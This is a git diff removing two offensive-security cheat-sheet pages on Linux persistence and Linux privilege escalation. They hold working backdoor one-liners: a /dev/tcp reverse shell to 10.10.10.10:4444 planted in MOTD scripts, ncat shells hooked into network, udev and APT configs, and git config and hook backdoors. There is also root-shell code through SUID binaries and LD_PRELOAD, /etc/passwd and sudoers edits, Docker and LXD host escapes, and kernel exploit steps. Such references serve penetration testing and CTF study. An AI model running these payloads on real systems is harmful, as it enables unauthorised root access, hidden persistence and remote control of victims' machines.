/tmp/pass.txt - -/usr/bin/sudo $@ -``` - - -## Backdooring a startup service - -* Edit `/etc/network/if-up.d/upstart` file - ```bash - RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" - sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart - ``` - - -## Backdooring Message of the Day - -* Edit `/etc/update-motd.d/00-header` file - ```bash - echo 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"' >> /etc/update-motd.d/00-header - ``` - - -## Backdooring a user startup file - -Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` - -```powershell -In : ~/.config/autostart/*.desktop - -[Desktop Entry] -Type=Application -Name=Welcome -Exec=/var/lib/gnome-welcome-tour -AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide -OnlyShowIn=GNOME; -X-GNOME-Autostart-enabled=false -``` - -## Backdooring a driver - -```bash -echo "ACTION==\"add\",ENV{DEVTYPE}==\"usb_device\",SUBSYSTEM==\"usb\",RUN+=\"$RSHELL\"" | tee /etc/udev/rules.d/71-vbox-kernel-drivers.rules > /dev/null -``` - -## Backdooring the APT - -If you can create a file on the apt.conf.d directory with: `APT::Update::Pre-Invoke {"CMD"};` -Next time "apt-get update" is done, your CMD will be executed! - -```bash -echo 'APT::Update::Pre-Invoke {"nohup ncat -lvp 1234 -e /bin/bash 2> /dev/null &"};' > /etc/apt/apt.conf.d/42backdoor -``` - -## Backdooring the SSH - -Add an ssh key into the `~/.ssh` folder. - -1. `ssh-keygen` -2. write the content of `~/.ssh/id_rsa.pub` into `~/.ssh/authorized_keys` -3. set the right permission, 700 for ~/.ssh and 600 for authorized_keys - -## Backdooring Git - -Backdooring git can be a useful way to obtain persistence without the need for root access. -Special care must be taken to ensure that the backdoor commands create no output, otherwise the persistence is trivial to notice. - -### Git Configs - -There are multiple [git config variables](https://git-scm.com/docs/git-config) that execute arbitrary commands when certain actions are taken. -As an added bonus, git configs can be specified multiple ways leading to additional backdoor opportunities. -Configs can be set at the user level (`~/.gitconfig`), at the repository level (`path/to/repo/.git/config`), and sometimes via environment variables. - -`core.editor` is executed whenever git needs to provide the user with an editor (e.g. `git rebase -i`, `git commit --amend`). -The equivalent environment variable is `GIT_EDITOR`. - -```properties -[core] -editor = nohup BACKDOOR >/dev/null 2>&1 & ${VISUAL:-${EDITOR:-emacs}} -``` - -`core.pager` is executed whenever git needs to potentially large amounts of data (e.g. `git diff`, `git log`, `git show`). -The equivalent environment variable is `GIT_PAGER`. - -```properties -[core] -pager = nohup BACKDOOR >/dev/null 2>&1 & ${PAGER:-less} -``` - -`core.sshCommand` is executed whenever git needs to interact with a remote *ssh* repository (e.g. `git fetch`, `git pull`, `git push`). -The equivalent environment variable is `GIT_SSH` or `GIT_SSH_COMMAND`. - -```properties -[core] -sshCommand = nohup BACKDOOR >/dev/null 2>&1 & ssh -[ssh] -variant = ssh -``` - -Note that `ssh.variant` (`GIT_SSH_VARIANT`) is technically optional, but without it git will run `sshCommand` _twice_ in rapid succession. (The first run is to determine the SSH variant and the second to pass it the correct parameters.) - -### Git Hooks - -[Git hooks](https://git-scm.com/docs/githooks) are programs you can place in a hooks directory to trigger actions at certain points during git's execution. -By default, hooks are stored in a repository's `.git/hooks` directory and are run when their name matches the current git action and the hook is marked as executable (i.e. `chmod +x`). -Potentially useful hook scripts to backdoor: - -- `pre-commit` is run just before `git commit` is executed. -- `pre-push` is run just before `git push` is executed. -- `post-checkout` is run just after `git checkout` is executed. -- `post-merge` is run after `git merge` or after `git pull` applies new changes. - -In addition to spawning a backdoor, some of the above hooks can be used to sneak malicious changes into a repo without the user noticing. - -Lastly, it is possible to globally backdoor _all_ of a user's git hooks by setting the `core.hooksPath` git config variable to a common directory in the user-level git config file (`~/.gitconfig`). Note that this approach will break any existing repository-specific git hooks. - - -## Additional Persistence Options - -* [SSH Authorized Keys](https://attack.mitre.org/techniques/T1098/004) -* [Compromise Client Software Binary](https://attack.mitre.org/techniques/T1554) -* [Create Account](https://attack.mitre.org/techniques/T1136/) -* [Create Account: Local Account](https://attack.mitre.org/techniques/T1136/001/) -* [Create or Modify System Process](https://attack.mitre.org/techniques/T1543/) -* [Create or Modify System Process: Systemd Service](https://attack.mitre.org/techniques/T1543/002/) -* [Event Triggered Execution: Trap](https://attack.mitre.org/techniques/T1546/005/) -* [Event Triggered Execution](https://attack.mitre.org/techniques/T1546/) -* [Event Triggered Execution: .bash_profile and .bashrc](https://attack.mitre.org/techniques/T1546/004/) -* [External Remote Services](https://attack.mitre.org/techniques/T1133/) -* [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/) -* [Hijack Execution Flow: LD_PRELOAD](https://attack.mitre.org/techniques/T1574/006/) -* [Pre-OS Boot](https://attack.mitre.org/techniques/T1542/) -* [Pre-OS Boot: Bootkit](https://attack.mitre.org/techniques/T1542/003/) -* [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053/) -* [Scheduled Task/Job: At (Linux)](https://attack.mitre.org/techniques/T1053/001/) -* [Scheduled Task/Job: Cron](https://attack.mitre.org/techniques/T1053/003/) -* [Server Software Component](https://attack.mitre.org/techniques/T1505/) -* [Server Software Component: SQL Stored Procedures](https://attack.mitre.org/techniques/T1505/001/) -* [Server Software Component: Transport Agent](https://attack.mitre.org/techniques/T1505/002/) -* [Server Software Component: Web Shell](https://attack.mitre.org/techniques/T1505/003/) -* [Traffic Signaling](https://attack.mitre.org/techniques/T1205/) -* [Traffic Signaling: Port Knocking](https://attack.mitre.org/techniques/T1205/001/) -* [Valid Accounts: Default Accounts](https://attack.mitre.org/techniques/T1078/001/) -* [Valid Accounts: Domain Accounts 2](https://attack.mitre.org/techniques/T1078/002/) - -## References - -* [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289) -* [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/) -* [http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html](http://turbochaos.blogspot.com/2013/09/linux-rootkits-101-1-of-3.html) -* [http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/](http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/) -* [Pouki from JDI](#no_source_code) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md deleted file mode 100644 index 220931c..0000000 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ /dev/null @@ -1,832 +0,0 @@ -# Linux - Privilege Escalation - -## Summary - -* [Tools](#tools) -* [Checklist](#checklists) -* [Looting for passwords](#looting-for-passwords) - * [Files containing passwords](#files-containing-passwords) - * [Old passwords in /etc/security/opasswd](#old-passwords-in-etcsecurityopasswd) - * [Last edited files](#last-edited-files) - * [In memory passwords](#in-memory-passwords) - * [Find sensitive files](#find-sensitive-files) -* [SSH Key](#ssh-key) - * [Sensitive files](#sensitive-files) - * [SSH Key Predictable PRNG (Authorized_Keys) Process](#ssh-key-predictable-prng-authorized_keys-process) -* [Scheduled tasks](#scheduled-tasks) - * [Cron jobs](#cron-jobs) - * [Systemd timers](#systemd-timers) -* [SUID](#suid) - * [Find SUID binaries](#find-suid-binaries) - * [Create a SUID binary](#create-a-suid-binary) -* [Capabilities](#capabilities) - * [List capabilities of binaries](#list-capabilities-of-binaries) - * [Edit capabilities](#edit-capabilities) - * [Interesting capabilities](#interesting-capabilities) -* [SUDO](#sudo) - * [NOPASSWD](#nopasswd) - * [LD_PRELOAD and NOPASSWD](#ld_preload-and-nopasswd) - * [Doas](#doas) - * [sudo_inject](#sudo_inject) - * [CVE-2019-14287](#cve-2019-14287) -* [GTFOBins](#gtfobins) -* [Wildcard](#wildcard) -* [Writable files](#writable-files) - * [Writable /etc/passwd](#writable-etcpasswd) - * [Writable /etc/sudoers](#writable-etcsudoers) -* [NFS Root Squashing](#nfs-root-squashing) -* [Shared Library](#shared-library) - * [ldconfig](#ldconfig) - * [RPATH](#rpath) -* [Groups](#groups) - * [Docker](#docker) - * [LXC/LXD](#lxclxd) -* [Hijack TMUX session](#hijack-tmux-session) -* [Kernel Exploits](#kernel-exploits) - * [CVE-2022-0847 (DirtyPipe)](#cve-2022-0847-dirtypipe) - * [CVE-2016-5195 (DirtyCow)](#cve-2016-5195-dirtycow) - * [CVE-2010-3904 (RDS)](#cve-2010-3904-rds) - * [CVE-2010-4258 (Full Nelson)](#cve-2010-4258-full-nelson) - * [CVE-2012-0056 (Mempodipper)](#cve-2012-0056-mempodipper) - - -## Tools - -There are many scripts that you can execute on a linux machine which automatically enumerate sytem information, processes, and files to locate privilege escalation vectors. -Here are a few: - -- [LinPEAS - Linux Privilege Escalation Awesome Script](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) - - ```powershell - wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh - curl "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -o linpeas.sh - ./linpeas.sh -a #all checks - deeper system enumeration, but it takes longer to complete. - ./linpeas.sh -s #superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk. - ./linpeas.sh -P #Password - Pass a password that will be used with sudo -l and bruteforcing other users - ``` - -- [LinuxSmartEnumeration - Linux enumeration tools for pentesting and CTFs](https://github.com/diego-treitos/linux-smart-enumeration) - - ```powershell - wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh - curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh - ./lse.sh -l1 # shows interesting information that should help you to privesc - ./lse.sh -l2 # dump all the information it gathers about the system - ``` - -- [LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks](https://github.com/rebootuser/LinEnum) - - ```powershell - ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t - ``` - -- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) -- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) -- [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) -- [Privilege Escalation through sudo - Linux](https://github.com/TH3xACE/SUDO_KILLER) - - -## Checklists - -* Kernel and distribution release details -* System Information: - * Hostname - * Networking details: - * Current IP - * Default route details - * DNS server information -* User Information: - * Current user details - * Last logged on users - * Shows users logged onto the host - * List all users including uid/gid information - * List root accounts - * Extracts password policies and hash storage method information - * Checks umask value - * Checks if password hashes are stored in /etc/passwd - * Extract full details for 'default' uid's such as 0, 1000, 1001 etc - * Attempt to read restricted files i.e. /etc/shadow - * List current users history files (i.e .bash_history, .nano_history, .mysql_history , etc.) - * Basic SSH checks -* Privileged access: - * Which users have recently used sudo - * Determine if /etc/sudoers is accessible - * Determine if the current user has Sudo access without a password - * Are known 'good' breakout binaries available via Sudo (i.e. nmap, vim etc.) - * Is root's home directory accessible - * List permissions for /home/ -* Environmental: - * Display current $PATH - * Displays env information -* Jobs/Tasks: - * List all cron jobs - * Locate all world-writable cron jobs - * Locate cron jobs owned by other users of the system - * List the active and inactive systemd timers -* Services: - * List network connections (TCP & UDP) - * List running processes - * Lookup and list process binaries and associated permissions - * List inetd.conf/xined.conf contents and associated binary file permissions - * List init.d binary permissions -* Version Information (of the following): - * Sudo - * MYSQL - * Postgres - * Apache - * Checks user config - * Shows enabled modules - * Checks for htpasswd files - * View www directories -* Default/Weak Credentials: - * Checks for default/weak Postgres accounts - * Checks for default/weak MYSQL accounts -* Searches: - * Locate all SUID/GUID files - * Locate all world-writable SUID/GUID files - * Locate all SUID/GUID files owned by root - * Locate 'interesting' SUID/GUID files (i.e. nmap, vim etc) - * Locate files with POSIX capabilities - * List all world-writable files - * Find/list all accessible *.plan files and display contents - * Find/list all accessible *.rhosts files and display contents - * Show NFS server details - * Locate *.conf and *.log files containing keyword supplied at script runtime - * List all *.conf files located in /etc - * Locate mail -* Platform/software specific tests: - * Checks to determine if we're in a Docker container - * Checks to see if the host has Docker installed - * Checks to determine if we're in an LXC container - -## Looting for passwords - -### Files containing passwords - -```powershell -grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null -find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \; -``` - -### Old passwords in /etc/security/opasswd - -The `/etc/security/opasswd` file is used also by pam_cracklib to keep the history of old passwords so that the user will not reuse them. - -:warning: Treat your opasswd file like your /etc/shadow file because it will end up containing user password hashes - - -### Last edited files - -Files that were edited in the last 10 minutes - -```powershell -find / -mmin -10 2>/dev/null | grep -Ev "^/proc" -``` - -### In memory passwords - -```powershell -strings /dev/mem -n10 | grep -i PASS -``` - -### Find sensitive files - -```powershell -$ locate password | more -/boot/grub/i386-pc/password.mod -/etc/pam.d/common-password -/etc/pam.d/gdm-password -/etc/pam.d/gdm-password.original -/lib/live/config/0031-root-password -... -``` - -## SSH Key - -### Sensitive files - -``` -find / -name authorized_keys 2> /dev/null -find / -name id_rsa 2> /dev/null -... -``` - -### SSH Key Predictable PRNG (Authorized_Keys) Process - -This module describes how to attempt to use an obtained authorized_keys file on a host system. - -Needed : SSH-DSS String from authorized_keys file - -**Steps** - -1. Get the authorized_keys file. An example of this file would look like so: - -``` -ssh-dss AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf ... (snipped) ... -``` - -2. Since this is an ssh-dss key, we need to add that to our local copy of `/etc/ssh/ssh_config` and `/etc/ssh/sshd_config`: - -``` -echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/ssh_config -echo "PubkeyAcceptedKeyTypes=+ssh-dss" >> /etc/ssh/sshd_config -/etc/init.d/ssh restart -``` - -3. Get [g0tmi1k's debian-ssh repository](https://github.com/g0tmi1k/debian-ssh) and unpack the keys: - -``` -git clone https://github.com/g0tmi1k/debian-ssh -cd debian-ssh -tar vjxf common_keys/debian_ssh_dsa_1024_x86.tar.bz2 -``` - -4. Grab the first 20 or 30 bytes from the key file shown above starting with the `"AAAA..."` portion and grep the unpacked keys with it as: - -``` -grep -lr 'AAAA487rt384ufrgh432087fhy02nv84u7fg839247fg8743gf087b3849yb98304yb9v834ybf' -dsa/1024/68b329da9893e34099c7d8ad5cb9c940-17934.pub -``` - -5. IF SUCCESSFUL, this will return a file (68b329da9893e34099c7d8ad5cb9c940-17934.pub) public file. To use the private key file to connect, drop the '.pub' extension and do: - -``` -ssh -vvv victim@target -i 68b329da9893e34099c7d8ad5cb9c940-17934 -``` - -And you should connect without requiring a password. If stuck, the `-vvv` verbosity should provide enough details as to why. - -## Scheduled tasks - -### Cron jobs - -Check if you have access with write permission on these files. -Check inside the file, to find other paths with write permissions. - -```powershell -/etc/init.d -/etc/cron* -/etc/crontab -/etc/cron.allow -/etc/cron.d -/etc/cron.deny -/etc/cron.daily -/etc/cron.hourly -/etc/cron.monthly -/etc/cron.weekly -/etc/sudoers -/etc/exports -/etc/anacrontab -/var/spool/cron -/var/spool/cron/crontabs/root - -crontab -l -ls -alh /var/spool/cron; -ls -al /etc/ | grep cron -ls -al /etc/cron* -cat /etc/cron* -cat /etc/at.allow -cat /etc/at.deny -cat /etc/cron.allow -cat /etc/cron.deny* -``` - -You can use [pspy](https://github.com/DominicBreuker/pspy) to detect a CRON job. - -```powershell -# print both commands and file system events and scan procfs every 1000 ms (=1sec) -./pspy64 -pf -i 1000 -``` - - -## Systemd timers - -```powershell -systemctl list-timers --all -NEXT LEFT LAST PASSED UNIT ACTIVATES -Mon 2019-04-01 02:59:14 CEST 15h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily.timer apt-daily.service -Mon 2019-04-01 06:20:40 CEST 19h left Sun 2019-03-31 10:52:49 CEST 24min ago apt-daily-upgrade.timer apt-daily-upgrade.service -Mon 2019-04-01 07:36:10 CEST 20h left Sat 2019-03-09 14:28:25 CET 3 weeks 0 days ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service - -3 timers listed. -``` - -## SUID - -SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is `root`, the uid will be changed to `root` even if it was executed from user `bob`. SUID bit is represented by an `s`. - -```powershell -╭─swissky@lab ~ -╰─$ ls /usr/bin/sudo -alh --rwsr-xr-x 1 root root 138K 23 nov. 16:04 /usr/bin/sudo -``` - -### Find SUID binaries - -```bash -find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; -find / -uid 0 -perm -4000 -type f 2>/dev/null -``` - -### Create a SUID binary - -| Function | Description | -|------------|---| -| setreuid() | sets real and effective user IDs of the calling process | -| setuid() | sets the effective user ID of the calling process | -| setgid() | sets the effective group ID of the calling process | - - -```bash -print 'int main(void){\nsetresuid(0, 0, 0);\nsystem("/bin/sh");\n}' > /tmp/suid.c -gcc -o /tmp/suid /tmp/suid.c -sudo chmod +x /tmp/suid # execute right -sudo chmod +s /tmp/suid # setuid bit -``` - - -## Capabilities - -### List capabilities of binaries - -```powershell -╭─swissky@lab ~ -╰─$ /usr/bin/getcap -r /usr/bin -/usr/bin/fping = cap_net_raw+ep -/usr/bin/dumpcap = cap_dac_override,cap_net_admin,cap_net_raw+eip -/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep -/usr/bin/rlogin = cap_net_bind_service+ep -/usr/bin/ping = cap_net_raw+ep -/usr/bin/rsh = cap_net_bind_service+ep -/usr/bin/rcp = cap_net_bind_service+ep -``` - -### Edit capabilities - -```powershell -/usr/bin/setcap -r /bin/ping # remove -/usr/bin/setcap cap_net_raw+p /bin/ping # add -``` - -### Interesting capabilities - -Having the capability =ep means the binary has all the capabilities. -```powershell -$ getcap openssl /usr/bin/openssl -openssl=ep -``` - -Alternatively the following capabilities can be used in order to upgrade your current privileges. - -```powershell -cap_dac_read_search # read anything -cap_setuid+ep # setuid -``` - -Example of privilege escalation with `cap_setuid+ep` - -```powershell -$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7 - -$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' -sh-5.0# id -uid=0(root) gid=1000(swissky) -``` - -| Capabilities name | Description | -|---|---| -| CAP_AUDIT_CONTROL | Allow to enable/disable kernel auditing | -| CAP_AUDIT_WRITE | Helps to write records to kernel auditing log | -| CAP_BLOCK_SUSPEND | This feature can block system suspends | -| CAP_CHOWN | Allow user to make arbitrary change to files UIDs and GIDs | -| CAP_DAC_OVERRIDE | This helps to bypass file read, write and execute permission checks | -| CAP_DAC_READ_SEARCH | This only bypasses file and directory read/execute permission checks | -| CAP_FOWNER | This enables bypass of permission checks on operations that normally require the filesystem UID of the process to match the UID of the file | -| CAP_KILL | Allow the sending of signals to processes belonging to others | -| CAP_SETGID | Allow changing of the GID | -| CAP_SETUID | Allow changing of the UID | -| CAP_SETPCAP | Helps to transferring and removal of current set to any PID | -| CAP_IPC_LOCK | This helps to lock memory | -| CAP_MAC_ADMIN | Allow MAC configuration or state changes | -| CAP_NET_RAW | Use RAW and PACKET sockets | -| CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | - -## SUDO - -Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) - -### NOPASSWD - -Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. - -```bash -$ sudo -l - -User demo may run the following commands on crashlab: - (root) NOPASSWD: /usr/bin/vim -``` - -In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. - -```bash -sudo vim -c '!sh' -sudo -u root vim -c '!sh' -``` - -### LD_PRELOAD and NOPASSWD - -If `LD_PRELOAD` is explicitly defined in the sudoers file - -```powershell -Defaults env_keep += LD_PRELOAD -``` - -Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` - -```c -#include -#include -#include -#include -void _init() { - unsetenv("LD_PRELOAD"); - setgid(0); - setuid(0); - system("/bin/sh"); -} -``` - -Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD= `, e.g: `sudo LD_PRELOAD=/tmp/shell.so find` - -### Doas - -There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` - -```bash -permit nopass demo as root cmd vim -``` - -### sudo_inject - -Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) - -```powershell -$ sudo whatever -[sudo] password for user: -# Press +c since you don't have the password. -# This creates an invalid sudo tokens. -$ sh exploit.sh -.... wait 1 seconds -$ sudo -i # no password required :) -# id -uid=0(root) gid=0(root) groups=0(root) -``` - -Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) - - -### CVE-2019-14287 - -```powershell -# Exploitable when a user have the following permissions (sudo -l) -(ALL, !root) ALL - -# If you have a full TTY, you can exploit it like this -sudo -u#-1 /bin/bash -sudo -u#4294967295 id -``` - -## GTFOBins - -[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. - -The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. - -> gdb -nx -ex '!sh' -ex quit -> sudo mysql -e '\! /bin/sh' -> strace -o /dev/null /bin/sh -> sudo awk 'BEGIN {system("/bin/sh")}' - - -## Wildcard - -By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy. - -```powershell -# create file for exploitation -touch -- "--checkpoint=1" -touch -- "--checkpoint-action=exec=sh shell.sh" -echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh - -# vulnerable script -tar cf archive.tar * -``` - -Tool: [wildpwn](https://github.com/localh0t/wildpwn) - -## Writable files - -List world writable files on the system. - -```powershell -find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null -find / -perm -2 -type f 2>/dev/null -find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null -``` - -### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat) - -/etc/sysconfig/network-scripts/ifcfg-1337 for example - -```powershell -NAME=Network /bin/id <= Note the blank space -ONBOOT=yes -DEVICE=eth0 - -EXEC : -./etc/sysconfig/network-scripts/ifcfg-1337 -``` -src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) - -### Writable /etc/passwd - -First generate a password with one of the following commands. - -```powershell -openssl passwd -1 -salt hacker hacker -mkpasswd -m SHA-512 hacker -python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' -``` - -Then add the user `hacker` and add the generated password. - -```powershell -hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash -``` - -E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` - -You can now use the `su` command with `hacker:hacker` - -Alternatively you can use the following lines to add a dummy user without a password. -WARNING: you might degrade the current security of the machine. - -```powershell -echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd -su - dummy -``` - -NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. - -### Writable /etc/sudoers - -```powershell -echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers - -# use SUDO without password -echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers -echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers -``` - -## NFS Root Squashing - -When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it. - -```powershell -# remote check the name of the folder -showmount -e 10.10.10.10 - -# create dir -mkdir /tmp/nfsdir - -# mount directory -mount -t nfs 10.10.10.10:/shared /tmp/nfsdir -cd /tmp/nfsdir - -# copy wanted shell -cp /bin/bash . - -# set suid permission -chmod +s bash -``` - -## Shared Library - -### ldconfig - -Identify shared libraries with `ldd` - -```powershell -$ ldd /opt/binary - linux-vdso.so.1 (0x00007ffe961cd000) - vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000) - /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000) -``` - -Create a library in `/tmp` and activate the path. - -```powershell -gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c -echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so -/opt/binary -``` - -### RPATH - -```powershell -level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH" - 0x00000001 (NEEDED) Shared library: [libc.so.6] - 0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] - -level15@nebula:/home/flag15$ ldd ./flag15 - linux-gate.so.1 => (0x0068c000) - libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x005bb000) -``` - -By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. - -```powershell -level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ - -level15@nebula:/home/flag15$ ldd ./flag15 - linux-gate.so.1 => (0x005b0000) - libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) - /lib/ld-linux.so.2 (0x00737000) -``` - -Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` - -```powershell -#include -#define SHELL "/bin/sh" - -int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) -{ - char *file = SHELL; - char *argv[] = {SHELL,0}; - setresuid(geteuid(),geteuid(), geteuid()); - execve(file,argv,0); -} -``` - -## Groups - -### Docker - -Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`. - -```bash -$> docker run -it --rm -v $PWD:/mnt bash -$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd -``` - -Almost similar but you will also see all processes running on the host and be connected to the same NICs. - -```powershell -docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash -``` - -Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell - -```powershell -$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease -latest: Pulling from chrisfosterelli/rootplease -2de59b831a23: Pull complete -354c3661655e: Pull complete -91930878a2d7: Pull complete -a3ed95caeb02: Pull complete -489b110c54dc: Pull complete -Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0 -Status: Downloaded newer image for chrisfosterelli/rootplease:latest - -You should now have a root shell on the host OS -Press Ctrl-D to exit the docker instance / shell - -sh-5.0# id -uid=0(root) gid=0(root) groups=0(root) -``` - -More docker privilege escalation using the Docker Socket. - -```powershell -sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash -sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh -``` - -### LXC/LXD - -The privesc requires to run a container with elevated privileges and mount the host filesystem inside. - -```powershell -╭─swissky@lab ~ -╰─$ id -uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel) -``` - -Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. - -```powershell -# build a simple alpine image -git clone https://github.com/saghul/lxd-alpine-builder -./build-alpine -a i686 - -# import the image -lxc image import ./alpine.tar.gz --alias myimage - -# run the image -lxc init myimage mycontainer -c security.privileged=true - -# mount the /root into the image -lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true - -# interact with the container -lxc start mycontainer -lxc exec mycontainer /bin/sh -``` - -Alternatively https://github.com/initstring/lxd_root - - -## Hijack TMUX session - -Require a read access to the tmux socket : `/tmp/tmux-1000/default`. - -```powershell -export TMUX=/tmp/tmux-1000/default,1234,0 -tmux ls -``` - - -## Kernel Exploits - -Precompiled exploits can be found inside these repositories, run them at your own risk ! -* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) -* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) - -The following exploits are known to work well, search for more exploits with `searchsploit -w linux kernel centos`. - -Another way to find a kernel exploit is to get the specific kernel version and linux distro of the machine by doing `uname -a` -Copy the kernel version and distribution, and search for it in google or in https://www.exploit-db.com/. - -### CVE-2022-0847 (DirtyPipe) - -Linux Privilege Escalation - Linux Kernel 5.8 < 5.16.11 - -``` -https://www.exploit-db.com/exploits/50808 -``` - -### CVE-2016-5195 (DirtyCow) - -Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 - -```powershell -# make dirtycow stable -echo 0 > /proc/sys/vm/dirty_writeback_centisecs -g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil 